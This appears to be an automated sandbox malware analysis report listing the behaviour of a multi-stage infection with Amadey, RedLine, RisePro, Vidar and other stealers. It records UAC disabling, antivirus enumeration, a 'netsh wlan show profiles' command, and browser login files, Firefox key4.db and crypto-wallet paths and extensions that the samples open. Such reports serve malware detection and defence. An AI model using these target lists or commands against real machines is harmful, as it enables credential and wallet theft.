Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u6po.1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u6po.1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u6po.1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u6po.1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u6po.1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u6po.1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u6po.1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u6po.1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u6po.1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u6po.1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u6po.1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u6po.1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u6po.1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u6po.1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u6po.1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\u6po.0.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\u6po.0.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008BD2B0 RegOpenKeyExA,RegQueryValueExA,RegOpenKeyExA,RegQueryValueExA,GetLocalTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,GetSystemInfo,GlobalMemoryStatusEx,CreateToolhelp32Snapshot,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA, 9_2_008BD2B0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008BD2B0 RegOpenKeyExA,RegQueryValueExA,RegOpenKeyExA,RegQueryValueExA,GetLocalTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,GetSystemInfo,GlobalMemoryStatusEx,CreateToolhelp32Snapshot,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA, 9_2_008BD2B0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disables UAC (registry)
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
AV process strings found (often used to terminate AV products)
Source: RegAsm.exe, 0000001D.00000002.2278813474.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2274630744.0000000000D77000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected Amadey
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Amadeys Clipper DLL
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll, type: DROPPED
Yara detected Amadeys stealer DLL
Source: Yara match File source: 35.0.NewB.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.NewB.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.explorha.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.NewB.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.amert.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.1CMweaqlKp.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.explorta.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000003.1721215690.00000000011E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.2050930258.0000000000E51000.00000020.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.2011865777.0000000000E51000.00000020.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1626992485.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1904362561.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1663910421.0000000000C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1868102298.0000000000611000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1663899661.0000000000731000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1826787054.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1732128904.0000000000701000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.2069776940.0000000000E51000.00000020.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1945079164.0000000000931000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.1894101326.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\NewB[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5348, type: MEMORYSTR
Yara detected Mars stealer
Source: Yara match File source: 47.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 47.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 51.3.u6po.0.exe.3680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.swiiii.exe.3cb5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 51.3.u6po.0.exe.3680000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.swiiii.exe.3cb5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002C.00000002.2151525456.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000033.00000003.2152173443.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2102303995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: 40.0.jok.exe.7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000028.00000000.2051081332.00000000007C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jok.exe PID: 8672, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\jok[1].exe, type: DROPPED
Yara detected RisePro Stealer
Source: Yara match File source: 00000024.00000003.2840876152.0000000007C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.2839845792.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.3354975509.0000000008152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3088709368.0000000007C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3082656269.0000000007D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.2839809905.0000000007CCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.2840195887.0000000007C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.2839878527.0000000007C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d361f35322.exe PID: 5772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 6636, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: d361f35322.exe PID: 8200, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 8964, type: MEMORYSTR
Yara detected SmokeLoader
Source: Yara match File source: 00000031.00000002.2229022734.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000002.2229087093.0000000003661000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: 47.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 47.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 51.3.u6po.0.exe.3680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.swiiii.exe.3cb5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.swiiii.exe.3cb5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 51.3.u6po.0.exe.3680000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002C.00000002.2151525456.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000033.00000003.2152173443.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2102303995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx
Source: RegAsm.exe, 0000001D.00000002.2226894863.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.walletRE
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.walletRE
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.jsons8
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet
Source: RegAsm.exe, 0000001D.00000002.2196300199.00000000008F7000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: 5AWallets/ExodusAC:\Users\user\AppData\Roaming\Exodus\exodus.wallet4Y)A%appdata%\Exodus\exodus.walletAkeystore
Source: MPGPH131.exe, 0000001B.00000002.3354809697.0000000007CD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Tries to harvest and steal WLAN passwords
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
